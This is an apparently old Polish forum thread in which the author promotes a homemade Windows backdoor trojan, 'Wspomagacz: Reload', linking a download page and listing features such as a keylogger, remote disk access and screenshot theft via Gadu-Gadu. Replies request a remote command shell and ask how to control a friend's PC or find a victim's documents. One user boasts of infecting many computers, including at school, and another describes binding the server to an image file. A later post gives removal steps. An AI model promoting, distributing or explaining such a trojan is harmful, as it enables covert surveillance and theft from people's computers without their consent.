Nowy polski trojan: Wspomagacz: Reload

[wspomagacz]

Witam wszystkich i zapraszam na stronę: www.wspomagacz.prv.pl

Na wyżej wymienionej stronie znajduje się NOWY POLSKI trojan „Wspomagacz: Reload”.

„Wspomagacz: Reload” – jest programem typu „Backdoor”, potocznie zwany trojanem (Koń Trojański) dla systemów Windows, 95/98/NT/ME/2000/XP/2003. Służy on do zdalnej „Administracji”;-). Dzięki temu, że do komunikacji klient – serwer używa serwerów Gadu-Gadu możliwa jest kontrola nad komputerem, który jest za NATem.

Zapraszam do pobrania i testowania!

 

[s@S@n]

Jeszcze nie niestowałem ale może być dobry. Mogłeś tylko nie publikować bo zaraz go będą wykrywać wszystkie Antygówna. A tak a propo to w czym został napisany ????.

 

[wspomagacz]

Wspomagacz: Reload został napisany w języku Object Pascal czyli Delphi

Jeszcze nie niestowałem ale może być dobry. Mogłeś tylko nie publikować bo zaraz go będą wykrywać wszystkie Antygówna. A tak a propo to w czym został napisany[/b]

Jak to "może być dobry" Wspomagacz jest najlepszy ;>

„Wspomagacz: Reload” składa się z 4 plików:
- Klient.exe – dzięki temu programowi możesz kontrolować komputer, na którym jest zainstalowany Serwer.
- Serwer.exe – należy zainstalować na komputerze, nad którym chce się mieć kontrolę.
- Konfigurator.exe – służy do konfiguracji Serwera.
- Usuwasz.exe – służy do wykrywania i usuwania, „Wspomagacz: Reload”. Przydatny, gdy np.: sam sobie zainstalujesz Serwer;-).

Kilka z funkcji Wspomagacza to:

- Pobieranie Screen’a i wysyłanie go przez GG lub na maila
- Pełny dostęp do dysku (kasowanie, uruchamianie, wgrywanie, wysyłanie…)
- Działający KeyLogger
- Lista otwartych okien i aktywnych procesów
- Zabijanie procesów
- Zabawa z oknami (zamknij, ukryj, enabled-disabled, minimalizuj…)
- Chat z ofiarą
- Wyświetlanie komunikatów
- Informacje o komputerze (ilość pamięci RAM, typ procesora)
- Informacja o aktywnych połączeniach i konfiguracji IP
- Funkcja wyłączenia, rozłączenia, usunięcia serwera
- Zapisywanie domyślnych ustawień konfiguratora do pliku INI
- Kilka innych mniejszych bajerów.

 

[s@S@n]

Trojan posiada mało funkcji, i nie ma żadnych orginalnych rozwiązań bez obrazy ofkoz. Może następne wersje będą lepsze. Choć nie jest najgorszy widziałem dużo gorsze trojany od tego.

 

[FLEJA]

Puki co tez go jeszcze nie testowalem, ale jestem w trakcie jego sciagania

Po opisie autora moge powiedziec, ze moze byc fajny ten trojanik, ale z ocena jeszcze poczekam. Podoba mi sie opcja 4 plikow serwer, klient, konfiguracja oraz usuwanie. Zycze powodzenia w pracy nad kolejnymi wersjami.

 

[KACZAN]

Mi w przygniatajacej wiekszosci trojanow brakuje jednej opcji: CMD na kompie ofiary.
Mimo iz niektore trojany udostepniaja naprawde mnostwo opcji, to nie umozliwiaja wszystkiego czego bym chcial, a w wierszu polecen mozna wiele

Zachecam autora do dodania tej funkcji w przyszlych wersjach 8)


Pozdrawiam.

 

[domrom]

sam go testuje-dla mnie jeż niezły

ale na serwer wysyła mi dziwne literki,dlaczego ?,wytłumacz mi jesgo działanie dokadnie?odpisz ,jakby co to gg: 6231672

 

[Silver]

Wspomagacz jest cooool!! Juz go zasialem w wielu kompach

Nawet w szkole (za NATEM)

. Dzieki bardzo za niego

 

[Mifczu]

A ja mam maly problem. Poustawialem nr i wogle. Uruchomilem serwer i kupa, nic sie nie dzieje. Pomyslelem se ze tak ma byc ale nawet ten usuwacz nic nie znalazl. Probowalem na swoim jak i na innym i nic sie nie dzieje. Klientem sie lacze dodalem do listy nr ofiary i jest na liscie ale nie na liscie online. Nie wiem chyba wszystko dobrze robie no tylko maili nie wpisywalem bo to chyba nie jest niezbedne ??

 

[boguc0]

ej jak skonfigurowac ten RELOAD bo nie moge sie polaczyc z nim, server jest u kolesia na kompie, mam jego numer GG i haslo i co dalej mam niby z tym zrobic? moze jakies bledne dane wpisalem? jak uruchamiam Klienta to mi sie moje GG wylacza tak ma to byc?

 

[RaDeK_16]

Moim zdaniem ten trojan jest taki sobie, nie jest najgorszy i nie jest najlepszy!!!! CZY KTOŚ ZNA TROJANKA CO DZIAŁA POZA NATEM BEZ ŻADNYCH HASEŁ????? POZDRO

 

[NoOne]

jak znalesc szukany dokument tekstowy na kompie ofiary?

jest jakis sposob czy trzeba wszystko recznie przeszukac?

 

[WalgO]

destruktor -> plik -> zakładka szukaj -> wpisujesz : nazwa_pliku.txt

 

[Nereus]

Zbindowałem serwer z plikiem graficznym i chciałem zobaczyć czy działa! Debil. Zapomniałem że mi się serwer zainstaluje. Na szczęście nie zieniałem w konfiguracji nazwy plików ani nazwy w rejestrze. Chce to usunąć! Pomóżcie. Wywaliłem z rejestru odpowiedni klucz ale na dysku zostaje plik SVCHOST32.exe . Ponieważ serwer jest aktywny to nie można go normalinie usunąć ani przenieść. Próbowałem rózwnież kasować spod DOSa przed uruchomieniem Windowsa ale go nie widać. Co proponujecie?
PS> nie moge za pomocą klienta bo ustawiłem fikcyjny numer gg i nie moge sie połączyć. [/b]

 

[Plik]

a z pod trubu awaryjnego ... :/
btw: jak usunales z rejestru to czemu sie jeszce wlacza ;];] - musisz usunac wszytsko z trybu awaryjnego ... :/
pozdro

 

[Nereus]

Nie patrzyłem dokładnie ale na forum nie ma o usunięciu tego trojana, a jeśli jest to niech i tu będzie, mniej będzie pytań o ten temat.
-------------------------------------------------------------------------
USUWANIE TROJANA WSPOMAGACZ: Reload

Ta metoda jest skuteczna w razie gdy sam omyłkowo uruchomisz serwer (w swoim systemie), który sam konfigurowałeś, bądż podesłany z domyślnymi opcjami nazw pliku i klucza rejestru.
1. Urucham rejestr (Start>Uruchom>regedit)
2. Wyszukaj i skasuj wszystko co ma nazwie to co podałeś podczas konfiguracji w polu "klucz". Domyśna wartość to svchost32.
3. Zrestartuj system a następnie skasuj plik svchost.exe z katalogu Windows.

 

[LAME-R]

svchost.exe to plik systemowy i nie można go wyłączyć !!

 

[Chochlik]

Originally posted by LAME-R
svchost.exe to plik systemowy i nie można go wyłączyć !!

Parwdziwy plik svhost.exe ten systemowy nie siedzi w katalogu windowsa

 

[matkal]

ghjh

 

[Dexter]

Czy ta strona dziala tylko na winshi... tzn. windowsie ???

Bo tak z ciekawosci chcialem zobaczyc i wyswietla tylko pusta strone na mozilli
ZRODLO:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN">

<HTML>

<HEAD>

<title>www.wspomagacz.prv.pl</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<meta name=robots content=ALL>

<meta name=description content="www.wspomagacz.prv.pl.">

<meta name=author content="[email protected]">

<meta name=keywords content="wspomagacz trojany backdoor keylogger polski polskie koń trojański trojan reload"><script type="text/javascript" src="http://adnet.hit.gemius.pl/script.js?id=LthZP54T3NYaA@fsG4juJvp7"></script>

</HEAD>

<frameset rows="100%,*"><frame name=41 noresize src="http://www.wspomagacz.xlarge.at">

<frame name="pozycjonowanie" scrolling="NO" noresize src="http://www.osemka.pl/pozycjonowanie.html"><noframes><body>[url="http://www.wspomagacz.xlarge.at"]www.wspomagacz.xlarge.at[/url]</body></noframes></frameset></HTML>